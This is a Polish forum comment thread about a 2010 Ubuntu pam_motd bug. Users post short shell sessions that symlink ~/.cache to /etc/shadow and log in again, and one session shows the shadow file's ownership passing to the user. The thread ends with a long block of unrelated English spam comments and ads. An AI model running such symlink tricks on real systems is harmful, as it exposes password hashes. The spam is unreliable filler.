Co do statystyk bezpieczenstwa – problem w tym, ze opiekunowie dystrybucji nie sa ludzmi madrzejszymi od ciebie albo ode mnie. To zwyczajni ludzie, zajmujacy sie tym dlatego, ze akurat maja czas. Nie maja jakichs specjalnych umiejetnosci czy wiedzy – kazdy moze developowac Linuksa, i w praktyce kazdy to robi, jesli akurat nie ma niczego ciekawszego lub bardziej dochodowego do roboty. Zwykle nie jest to problemem, bo jesli ktos zrobi cos glupiego, to ktos inny wylapie. Czasami nie wylapuje, i wtedy dochodzi do sytuacji takich, jak ta opisana w niusie.
Co do przedostatniego zdania – poziom bezpieczenstwa w Windows tez jest wystarczajacy, wedlug niektorych.
Dzyzas, to wyglada jak jakis prostacki wjazd przez
procmaila/sendmaila ze starych tutoriali
Ponieważ to problem na poziomie użytkowania ubuntu. Dystrybucję tworzą użytkownicy, ponieważ dla nich jest ona tworzona. Nie będę wspominał niczego na temat zaniżania ogólnego poziomu przez masy, gdy coś się popularyzuje. Nic dodać nic ująć.
<code>
ptecza@anahaim:~$ mv ~/.cache/ ~/.cache.bak
ptecza@anahaim:~$ ln -s /etc/shadow ~/.cache
ptecza@anahaim:~$ ssh localhost
ptecza@anahaim:~$ cat /home/ptecza/.cache
cat: /home/ptecza/.cache: Permission denied
ptecza@anahaim:~$ ls -l ~/.cache
lrwxrwxrwx 1 ptecza ptecza 11 2010-07-08 16:40 /home/ptecza/.cache -> /etc/shadow
ptecza@anahaim:~$ ls -l /etc/shadow
-rw-r—– 1 root shadow 960 2009-10-07 09:55 /etc/shadow
ptecza@anahaim:~$ lsb_release -rc
Release: 9.04
Codename: jaunty
</code>
Mam Ubuntu 10.04 i też ta luka to nie działa
Może nie zauważyłeś że zainstalowała się poprawka. Ja tak miałem swego czasu, jak w okolicach 5.10 instalator zapisywał hasło tworzonego użytkownika w logach. Zanim zdążyłem sprawdzić czy u mnie też zapisał, problem został naprawiony.
Poprawka ci chyba nie usunęła wpisu z logów?
To w takim razie należyty się pochwała twórcą Ubuntu za szybkie załatanie luki
A dlaczego np. postinst nie mógłby tego zrobić?
https://lists.ubuntu.com/archives/ubuntu-security…
Więc nie tak źle z moją pamięcią;) Nawet numer wydania się zgadza;)
https://lists.ubuntu.com/archives/ubuntu-security…
Ta luka działa, ale tylko dla użytkowników którzy są administratorami (którzy i tak mają dostęp do wszystkiego). Dla użytkowników nie oznaczonych w systemie jako administrator nie działa. Proponuje zmienić treść artykułu, no chyba że to prowokacja
Zrodlo, czy tak sobie pobredzasz?
Masz rację, działa, przynajmniej na jednym z kilku systemów które testowałem.
Bzdury.
Po pierwsze: nie działa.
Po drugie: co ci po linkowaniu pliku shadow jak i tak nie masz do niego dostępu (nie można go zcat'ować).
Po trzecie: na localhost musi być zainstalowany serwer SSH.
Po czwarte: po zalogowaniu 'ssh localhost' i tak nie możesz zajrzeć do pliku shadow, zmienić właściciela, ani dodać sobie uprawnienia do odczytu.
Co się dziwisz, newsa dodał czołowy troll osnews.
@QkiZ: Po pierwsze – dziala. Po drugie, luka powoduje zmiane wlasciciela linkowanego pliku, w tym przypadku shadow. Naprawde, czytanie nie boli.
Taa działa, przed napisaniem warto zweryfikować czy jest to prawda, zwłaszcza gdy nie korzysta się w własnych doświadczeń.
<code>
andre@komp:~$ ln -s /etc/shadow ~/.cache
andre@komp:~$ ssh localhost
andre@comp:~$ less /home/andre/.cache
/home/andre/.cache: Permission denied
andre@comp:~$ ls -al /home/andre
…
lrwxrwxrwx 1 andre andre 11 2010-07-08 23:21 .cache -> /etc/shadow
…
andre@komp:~$ ls -al /etc/shadow
-rw-r—– 1 root shadow 1042 2010-06-08 18:13 /etc/shadow
andre@komp:~$ uname -a
Linux komp 2.6.32-23-generic #37-Ubuntu SMP Fri Jun 11 07:54:58 UTC 2010 i686 GNU/Linux
andre@komp:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 10.04 LTS
Release: 10.04
Codename: lucid
</code>
Jak działa!?, jaka zmiana właściciela /etc/shadow!? Naprawdę samodzielna weryfikacja "testu" nie jest trudna
A mnie się udało – na 9.10 na maszynie wirtualnej, której rzadko używam, więc pewnie nie ma jeszcze żadnych aktualizacji:
$ rm -rf ~/.cache; ln -s /etc/shadow ~/.cache; ssh localhost
The authenticity of host 'localhost (::1)' can't be established.
(…)
$ ls -l /etc/shadow
-rw-r—– 1 przemek przemek 1035 2010-07-09 00:15 /etc/shadow
I tak jak się spodziewałem, po
apt-get upgrade
już nie działa. Słowem, jeżeli komuś nie wyszło, znaczy to, że ma już naprawiony błąd a nie że błędu nigdy nie było.
To pokaż mi screen z udanego ataku. Bo jak na razie testowałem na dwóch kompach z Ubuntu i nie działa.
@QkiZ: Masz kilka przykladow powyzej.
Volia, świeże 10.04, zainstalowałem tylko openssh-server:
http://yfrog.com/5hexploitvp
Ech, ci dzisiejsi linuksiarze… Nawet nie potrafią przekleić kilku linijek żeby się przekonać, że jednak — przynajmniej na 9.10 — działa.
Also: och, och, ale przecież Linux jest bezpieczny by design, więc jak to możliwe?
Aby to w ogóle się powiodło na 9.10 musisz mieć zainstalowany serwer ssh na swoim kompie. Jak ktoś nie ma uprawnień to i tak nie zainstaluje, a ten cały bug może połamać sobie o kant dupy.
O, i juz mamy idiotyczna racjonalizacje, wystarczy nie miec
ssh zainstalowanego. Bug w kernelu, wystarczy nie miec kernela
zainstalowanego, itp, itd.
Update, nie trzeba mieć ssh. Wystarczy przełączyć się na tekstową konsolę (np. kombinacją klawiszy Ctrl+Alt+F1):
http://yfrog.com/11exploit2p
(przed zalogowaniem się przywróciłem oryginalne prawa do /etc/shadow).
@jarek: a teraz wymyśl coś naprawdę śmiesznego bo jesteś żałosny.
Hmm. W więcej informacji za dużo informacji nie ma więc nie mając Ubuntu zapytam – dlaczego pam_motd (moduł wyświetlający /etc/motd):
a) Czyta cokolwiek poza /etc/motd (+ odpowiednimi plikami .so) – w tym .cache
b) Zmienia jakiekolwiek uprawnienia
Pewnie zogdnie z linuksianym rozumieniem reguly KISS,
bootloader ma gettext, pam_motd majstruje Ci w katalogu
domowym, a odtwarzach mp3 ma wbudowany silnik sql.
Logiczny, spojny i minimalistyczny dizajn prowadzacy
prosta droga do softu najwyzszej jakosci.
Nie rozumiem. Odtwarzacz MP3 musi mieć silnik bazodanowy – to obecnie standard. Ludzie trzymają na dyskach mnóstwo muzyki.
gettext w GRUB2, to świetna rzecz. Ukłon w stronę początkujących użytkowników.
Natomiast z jakich powodów pam_motd majstruje w katalogu domowym, to ja nie MIEĆ
pojęcia.
@Sławek: Poczatkujacy uzytkownik nie powinien miec zadnego kontaktu z bootloaderem. Jesli ma, i w dodaktu potrzebuje lokalizacji, to znaczy, ze cos jest mocno nie teges.
Bo przy pierwszym logowaniu miało toto wyświetlić jakieś diskjalmery czy inny WolnoMyślicielski crap, po czym zapisać informację, że oczom danego usera Święta Licencja została wyrecytowana.
Po przebiciu sie przez komentarze, dotarlo do mnie, jak zenujaco niska
jest wiedza czytaczy OSnews o tak podstawowych elementach systemu jak
shadow czy passwd czy nawet praw do plikow i zmiana wlascicieli.
Moze warto wprowadzic mechanizm, przed wyslaniem komentarza, odpowiedz
na jedno, proste, losowe pytanie techniczne, moze widzielibysmy tu mniej
fanatycznych bredni?
Po co ktokolwiek mialby w takiej sytuacji dyskutowac na OSNews? Do technicznych dyskusji trzymajacych poziom sa inne miejsca w sieci.
Xacly. Twoja obecność wyklucza merytoryczną dyskusję na wysokim poziomie.
Dziekuje za udowodnienie mojej tezy nic nie wnoszacym argumentem ad personam.
Tak się składa, że trasz jest jedną z niewielu(jedyną) osobą na osnews.pl z wiedzą na temat systemów operacyjnych. Trasz, zawsze zastanawiam się: po co tu tracisz czas? Twoje argumenty i tak do nikogo nie trafią, bo nikt ich nie zrozumie. Za to zawsze możesz liczyć na typowo linuxiarskie gnojenie na wysokim poziomie. Nie lepiej założyć własnego techbloga w stylu niebezpiecznika?
Odwzajemnione
Zasłużone.
@wykopek: Odpreza mnie to. To, czyli, jak to ladnie nazwal WO, "gra w posty", czy, w tym przypadku, "gra w komentarze". Jedni graja w Tibie, inni pisza na OSNews
Btw. Linux ma znacznie lepszej jakości kod. Kiedyś był artykuł i zestawiono w nim pewną dystrybucję Linuksa z Freebsd i okazało się, że kod Linuksa mając znacznie więcej lini kodu zawiera mniej błędów!
Tyle, ze metoda liczenia (skaner Coverity) kompletnie nie nadawala sie do porownywania ilosci bledow, ze wzgledu na rozna (od paru do 90%) ilosc false positives. Z miarodajnych statystyk – ktore opieraja sie na czestosci znajdowania faktycznych dziur – wynika, ze Linux jest dziurawy mniej wiecej na poziomie Windows.
Wow! A może te Twoje "miarodajne statystyki" mówią o tym że Linux podlega lepszemu od FreeBSD audytowi?
Bo przecież podlega, to nie jest jakaś tajemnica.
Jeżeli połączysz fakty że "teoretycznie" FreeBSD jest bardziej dziurawe, za to Linux ma więcej dziur bo podlega lepszemu audytowi, to możesz wysunąć prosty logiczny wniosek – te dziury FreeBSD po prostu nie zostały jeszcze wykryte.
Jeśli dodać do tego Twoje ulubione twierdzenie że "źli ludzie wiedzą wszystko dużo wcześniej" – no to masz obraz FreeBSD jako systemu niebezpiecznego – nie dość że dziurawego to jeszcze niełatanego
. Bo skoro o danej dziurze publicznie nie wiadomo – to nie da się jej załatać.
A teraz na temat – no tak wykryli banalną lukę w Ubuntu. Łał, jestem w szoku, bardzo mi z tego powodu smutno… To tylko potwierdza moje zdanie o Ubuntu
, którego nigdy nie używałem…
numerous book you’ve pick up
huge tally you’ve lock up
What a super site and inspiring posts, I will post a link on my blogroll and bookmark this site. Regards! Thanks! Cheers! Nehawka Fire Departments
Thanks for your posting. My spouse and i have generally noticed that a lot of people are needing to lose weight since they wish to show up slim in addition to looking attractive. Even so, they do not generally realize that there are other benefits for losing weight in addition. Doctors insist that over weight people experience a variety of diseases that can be directly attributed to their own excess weight. The great thing is that people that are overweight along with suffering from different diseases can reduce the severity of their own illnesses by means of losing weight. It is possible to see a slow but marked improvement in health if even a minor amount of losing weight is obtained.
While I tend to agree with the post I strongly believe that car insurance has become too complex for the average policy holder. Just like any important purchase however you must perform due diligence and research the car insurance companies before you purchase.
I usually don’t leave blog comments but your writing forced me to, amazing work.
We stumbled over here different web address and thought I might check things out. I like what I see so now i’m following you. Look forward to going over your web page yet again.
Really interesting….
I tried Digg but do I have to sign up very first?
I found your blog site on google and verify a number of of your early posts. Proceed to maintain up the superb operate. I just additional up your RSS feed to my MSN Information Reader. In search of ahead to studying more from you in a while!…
I was recommended this blog by my cousin. I’m not sure whether this post is written by him as nobody else know such detailed about my problem. You’re incredible! Thanks!
One thing I’d like to say is always that before obtaining more pc memory, have a look at the machine within which it could be installed. In case the machine is definitely running Windows XP, for instance, the actual memory threshold is 3.25GB. Adding above this would basically constitute any waste. Be sure that one’s motherboard can handle the particular upgrade volume, as well. Interesting blog post.
I really loved your post, thanks for sharing. — La Grange Passport Offices
This is certainly a well written article. My only issue is I am having an issue with your RSS feed . For some reason I am unable to subscribe to it. Is there anybody have an similar RSS problem? If anybody else is having a similar issue please let me know Nipple351@gmail.com.
Thank you for the good writeup. It in fact was a amusement account it. Look advanced to more added agreeable from you! However, how can we communicate?
I am not sure where you’re getting your info, but good topic. I needs to spend some time learning much more or understanding more. Thanks for excellent info I was looking for this info for my mission.
This excellent website rocks !. We repeatedly hit upon a new challenge & varied listed here. I appreciate you for that may knowledge.
I think this post was probably a strong starting to some potential series of content articles about this topic. So many users pretend to know what they’re preaching about with regards to this area and generally, almost no one really get it. You seem to grasp it however, so I think you require to operate with it. Thank you!
I’m wondering now if we can talk about your sites statistics – search volume, etc, I’m trying to sites I can buy adspace through – let me know if we can talk about pricing and whatnot. Cheers mate you’re doing a great job though.
Terrific work! This is the type of info that should be shared around the internet. Shame on Google for not positioning this post higher! Come on over and visit my website . Thanks =)
Fame will go by and, so long, I’ve had you, fame. If it goes by, I’ve always known it was fickle. So much less than it’s something I experience, but that is not the place I live.
Good to know
Thanks for taking the time to debate this, I really feel strongly about it and love learning extra on this topic. If potential, as you gain experience, would you thoughts updating your weblog with further data? This can be very useful for me.
I usually don’t leave blog comments but your article forced me to, wonderful work.
Neutral rocks !. We frequently run into something more challenging & totally different listed here. I appreciate the personal data.
Excellent Information.very good show..considerably more delay ..
…
קידום דפי אינטרנט עושים רק בחברת קידום אתרים אמינה כמו חברת נט-סטייל . צרו עמנו קשר על מנת לרכוש שרות של קידום אתרים בגוגל בדרך הטובה ביותר.
In the event that you’ve recently been following the blogging as well as social media world over the last several years, you understand that there’s one particular very hot issue which continues appearing: and that is the actual debate about remarks on blogging sites. Should blogs include remarks? Need all these comments be moderated?
What i find troublesome is to discover a blog that can seize me for a minute however your blog is different. Bravo.
Cool
I just could not leave your website before suggesting that I really enjoyed the actual useful info you offer to your visitors…
You made some respectable points there. I looked on the internet for the problem and found most individuals will go along with with your website.
Great wordpress blog here.. It’s hard to find quality writing like yours these days. I really appreciate people like you! take care
Hey – nice blog, simply looking around some blogs, seems a pretty good platform You Are using. I’m at the moment using Drupal for a number of of my sites but trying to change one among them over to a platform very much the identical to yours as a trial run. Anything in particular you’ll advocate about it?
I really liked your post, thanks for sharing. — Jenna Douglas
I’d should check with you here. Which is not something I normally do! I enjoy reading a submit that can make individuals think. Also, thanks for permitting me to remark!
Many thanks for posting this, It?s simply what I was researching for on bing. I?d lots comparatively hear opinions from a person, slightly than a company internet page, that?s why I like blogs so significantly. Many thanks!
How do you fancy becoming your individual boss, choosing your own functioning hours and meeting new individuals just about every day? Would you prefer to make good income and have the satisfaction of assisting people master a thing new? It is simple to see why a lot of men and women from just about every walk of life would like to be a driving instructor.
Nice blog! Is your theme custom made or did you download it from somewhere? A theme like yours with a few simple tweeks would really make my blog shine. Please let me know where you got your theme. With thankscoach outlet
I’ll end up being subscribing in your feed and that i hope you submit again shortly.
Great thanks
I’ve to confess that i generally get bored to read the whole thing however i believe you’ll be able to add some value. Bravo !
Great thanks
Hiya intelligent points.. now why did not i consider those? Off subject slightly, is that this web page pattern merely from an bizarre installation or else do you utilize a personalized template. I exploit a webpage i’m searching for to enhance and nicely the visuals is likely one of the key things to complete on my list.
This is definitely a excellent post. My only issue is I am seeing an issue with your RSS feed . For some reason I am unable to subscribe to it. Is there anybody have an identical RSS issue? If somebody else is having the same issue please contact me Neria1986@gmail.com.
After I originally commented I clicked the -Notify me when new comments are added- checkbox and now each time a remark is added I get four emails with the same comment. Is there any means you possibly can take away me from that service? Thanks!
OrderYourname.com domains supplies web hosting, switch domains, domain name lookup, domnain leaders, and allows you to buy domains.
This is an spectacular entry. Thank you very much for the supreme post provided! I was looking for this entry for a long time, but I wasn’t able to find a reliable source.
Hello! I just would like to give a huge thumbs up for the great info you have here on this post. I will be coming back to your blog for more soon.
Great thanks
I wanted to thanks for this nice learn!! I undoubtedly having fun with each little bit of it I’ve you bookmarked to take a look at new stuff you publish
WONDERFUL Post.thanks for share..more wait .. …
This is actually your very positive learn in my situation, Will need to own up to if you find yourself One out of one of the best the blogosphere That i of all time found.Many thanks posting this clarifying report.
hey all, I was just checkin’ out this blog and I actually admire the idea of the article, and don’t have anything to do, so if anyone wish to to have an engrossing convo about it, please contact me on AIM, my title is heather smith
Hi! My friend just gave me lunch coz’ I showed him your blog post. I had free of charge lunch all thanks to you! Massive smile! Kudos for this publish!
Respect to post author, some great information .
Hello there! Do you know if they make any plugins to protect against hackers? I’m kinda paranoid about losing everything I’ve worked hard on. Any tips? Also, please visit my blog http://hitachikc18ddl.livejournal.com/585.html